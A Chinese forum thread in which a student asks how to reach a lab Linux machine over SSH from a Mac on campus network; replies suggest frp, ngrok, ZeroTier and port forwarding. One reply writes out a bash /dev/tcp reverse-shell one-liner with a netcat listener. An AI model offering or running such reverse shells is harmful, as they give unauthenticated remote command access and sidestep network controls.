这是一个创建于 1883 天前的主题,其中的信息可能已经有所发展或是发生改变。
- 我自己有一台电脑,mac,连着校园网,但是没连着实验室内网
- 实验室有一台电脑,linux,连着实验室内网
- 实验室内网可以通过校园网上网
有什么办法可以让我用自己的 mac 通过校园网 ssh 到 linux 吗,题主小白,对 linux 和 ssh 不太了解,恳请各位解答~
第 1 条附言 · 2019-10-03 14:57:05 +08:00
用笨办法搞定了,zerotier,感觉需要公网 ip 的都有点麻烦。
- 本来比较像用的方法是 serveo.net , 看起来好像很简单,但是需要 linux 翻墙,我不敢在服务器上瞎装软件,所以作罢了
- 反弹 shell 的操作搜了一会没看明白
- 因为不太懂,免费的 frp 服务申请了发现不大会配置,所以作罢,https://www.natfrp.org/ 感觉这个会用应该还蛮好的
- 本来比较像用的方法是 serveo.net , 看起来好像很简单,但是需要 linux 翻墙,我不敢在服务器上瞎装软件,所以作罢了
- 反弹 shell 的操作搜了一会没看明白
- 因为不太懂,免费的 frp 服务申请了发现不大会配置,所以作罢,https://www.natfrp.org/ 感觉这个会用应该还蛮好的
 |
1
Juszoe 2019-10-03 11:13:31 +08:00
在你们实验室的路由器设置端口映射
|
 |
2
z7356995 2019-10-03 11:21:08 +08:00 via Android
一楼建议不太可行,一般没有这个权限,frp 内网穿透了解一下,需要一台有公网 ip 的 vps 做端口转发实验室的 ssh 端囗
|
 |
3
fengshils 2019-10-03 11:21:45 +08:00 via Android
实验室电脑上做个端口转发
|
|
4
fengshils 2019-10-03 11:22:37 +08:00 via Android
frp 跟 ngrok 需要公网 ip 限制比较大
|
 |
5
635614874 OP @z7356995 这个一台有公网 ip 的 vps,比如是什么呢~ 我们实验室还有个群晖的 nas,我的电脑和 linux 都可以访问,可以吗?但是我好像不能配置这个 nas
|
 |
6
Chauncey09 2019-10-03 11:26:15 +08:00 via Android
1 看一下实验室校园网是否能否 ping 通宿舍内网 IP,有权限做端口转发是否
2 无法满足上述全部条件,做没网穿透。内网穿透方法很多,frp 和 ngrok 都可以。 |
 |
7
eason1874 2019-10-03 11:28:04 +08:00
简单来说,就是先在实验室公网跳板机(或者路由)指定一个端口,把这个端口流量转发到 linux 的 ssh 端口,然后你的 mac 你就可以用实验室公网 IP 和指定的端口访问了。
mac -> 实验室公网 IP:指定端口 -> 实验室跳板机流量转发 -> Linux 机器内网 IP:SSH 端口 原理是这么个原理,不过我只配置过跳板机 iptables 没在路由器上配置过,智能路由配置的话可能更简单? |
|
8
635614874 OP @Chauncey09 学校校园网 ip 应该是 127.0.0.1,linux 和我的电脑都可以 ping 通,用 ifconfig 查看 linux 的 ip,发现另一个 ip 是 192.168.1.169 ,这个 ip 可以连 ssh. 所以这应该算满足第一个条件『看一下实验室校园网是否能否 ping 通宿舍内网 IP,有权限做端口转发是否』?
|
 |
9
imWBB 2019-10-03 11:44:51 +08:00
|
 |
11
scukmh 2019-10-03 12:19:07 +08:00
关键词,内网穿透,自己 google 去,建议先学习下计算机网络,等大三再学太晚了。
|
 |
12
shakespaces 2019-10-03 12:24:18 +08:00 via Android
@635614874 和 ss 不是一个东西
|
 |
14
Ackvincent 2019-10-03 12:53:24 +08:00
|
 |
16
HeliumTang 2019-10-03 13:08:02 +08:00
|
 |
17
CEBBCAT 2019-10-03 13:20:04 +08:00 via Android
frp 最简单,也有免费的服务提供,再加上 ssh 是加密的,估计没啥问题,就是得小心对一下公钥指纹
|
|
18
635614874 OP @HeliumTang 感谢!这个好像还不错,但是必须要挂梯子才能连到这个服务器
|
 |
19
jinliming2 2019-10-03 14:08:18 +08:00 via iPhone
实验室机器可以连到你的 Mac 吗?可以的话就反弹个 shell 出来就行了
|
|
20
635614874 OP @jinliming2 可以反向连接上!但是反弹 shell 是什么操作,有点搞不明白
|
 |
21
optional 2019-10-03 14:57:25 +08:00 via Android
zerotier 比楼上的都简单
|
 |
22
ClericPy 2019-10-03 15:12:35 +08:00
python 有个 jumpserver, 简单说就是跳板机 /堡垒机, 不过... 反代不行么
|
 |
23
Va1n3R 2019-10-03 15:19:16 +08:00
免費的 ngork 公網服務: https://www.ngrok.cc/
|
 |
24
ruimz 2019-10-03 16:15:59 +08:00 via Android
买一个能联网的主机(下称 A )放在校园网内,在这个机器 A 上运行 frp,在实验室的服务器连到这个机器 A 的 frp 上,Mac 连接那校园网的那个主机 A。
问题在于怎么知道主机 A 的校园网地址,比较缺德的方法是主机 A 给 255.255.255.255 发广播包,Mac 上收包就可以了 主机 A 可以使用各种派或者盒子 |
 |
25
wslzy007 2019-10-03 18:16:56 +08:00
无需外网 ip,可以试试 smarGate: https://github.com/lazy-luo/smarGate
|
 |
26
KasuganoSoras 2019-10-03 18:20:56 +08:00
刚想来安利下 Sakura Frp 发现楼上已经有人发了。
内网穿透简直不要太简单,注册账号,添加隧道,下载客户端运行一气呵成,五分钟搞定。 添加隧道也是相当简单,首先点一下这个按钮  然后点击一下“随机端口”,最后点添加,完事了。 接着根据你的系统类型下载客户端,比如 Linux,那么就下载 Linux x86 或者 x64,下载后 chmod +x 设置权限最后运行即可,输入你的账号密码登录,选择一个服务器连接,然后 —— 开始玩耍吧 |
 |
27
Hoshizora 2019-10-03 21:03:23 +08:00 via Android
不先试试能不能直接访问吗?校园网是个大内网啊,你试试在实验室电脑上能否 ping 通你自己电脑,如果你们实验室要求不严那应该是能 ping 通的,再然后看有没有权限做端口转发了,IP 应该是 172 开头的。如果不能通那就只能用内网穿透了,还是建议先试试第一种方法,体验上会更好。
|
 |
28
mcone 2019-10-03 22:27:19 +08:00
你这个需求是典型的“内网穿透”(其实不一定是穿透的公网,你有一个做跳板的就可以了)
|
|
29
jinliming2 2019-10-04 10:57:55 +08:00 via iPhone
@635614874 反弹 shell 概念挺多,但其实就两条命令就行,Mac 上装个 nc 命令( net cat,一般 Linux 都有,但是 Mac 默认没有)。
然后 Mac 上运行 nc -lvp 12345 (看具体 nc 版本,有些 l、p 参数不能同时存在的,直接 nc -lv 12345 ),这句话是在 Mac 上启一个 TCP 服务监听 12345 端口。 然后在实验室机器上运行 bash -i >& /dev/tcp/123.123.123.123/12345 0>&1 把里面的 123.123.123.123 改成你 Mac 的 IP,12345 是端口。 然后你 Mac 上就可以直接操作实验室机器了。 就装个 Map 没自带的 NetCat,就两条命令,不用任何配置文件,不需要中间跳板,不需要公网,只要两个设备其中一个能访问到另一个即可,比楼上各位都简单。随用随开,用完 ctrl+c 即可退出。 附我觉得对反弹 shell 讲的比较详细的原理文章: https://xz.aliyun.com/t/2548 https://xz.aliyun.com/t/2549 |
 |
30
wzwwzw 2019-10-04 19:20:05 +08:00
frp
|
 |
31
tubimasky 2019-10-04 21:02:17 +08:00 via Android
反向 ssh autossh
|
 |
32
Lighfer 2019-10-04 21:44:40 +08:00
zerotier,实验室的 linux 配置一下 iptables,然后 zerotier 允许这台 linux 作为桥接,把实验室内网网段路由过去,就可以在 mac 上远程访问整个实验室内网了。
|
|
33
Lighfer 2019-10-04 21:45:11 +08:00
如果有一台云服务器的话,再搭一个 moon,首次连接的速度飞快
|
 |
34
riddle4ever 2019-10-05 00:06:25 +08:00 via Android
可以参考一下 nps 中的 p2p 服务
[github 地址]( https://github.com/cnlh/nps) |
 |
35
zhao305149619 2019-10-08 11:00:45 +08:00
这个东西无论是 google 还是垃圾百度不是一堆方法吗?
|
|
36
635614874 OP @zhao305149619 是,自己也搜索过,但是有点盲人摸象的感觉,好像每种方法都可以但情况又不完全相同,所以来问一下大家
|
 |
37
aaaaasam 2019-10-08 13:42:42 +08:00
按你所说,我觉得实验室和校园网应该是互通的,你可以尝试遗漏做法
|
|
39
635614874 OP @aaaaasam 遗漏做法是指?实验室的内网是可以连到校园网的,但是我通过校园网 ping 不通实验室电脑的 ip
|
|
40
zhao305149619 2019-10-09 15:31:04 +08:00
你如果有服务器就 frp 一个最好,理论上校园网是一个大局域网,可以在实验室的路由器设置一个花生壳的 DDNS 最端口转发应该也可以。
|
|
41
HeliumTang 2019-10-10 16:13:05 +08:00
楼主怎么解决 zerotier 不稳定?
|
|
42
HeliumTang 2019-10-10 16:58:51 +08:00
@Lighfer 用阿里云就行吗
|
|
43
635614874 OP @HeliumTang 我最近用着还行,挺稳定的
不稳定的问题我可能不会解决 手动狗头 |
|
44
Lighfer 2019-10-10 23:23:40 +08:00 via iPhone
@HeliumTang 国内的都可以,速度都很快。ios 我这边始终用不了,但是除开 ios,其他设备都很稳定,速度也很快。家里的 proxmox 服务器上作为 zerotier 网关,方便的一比
|
Select Language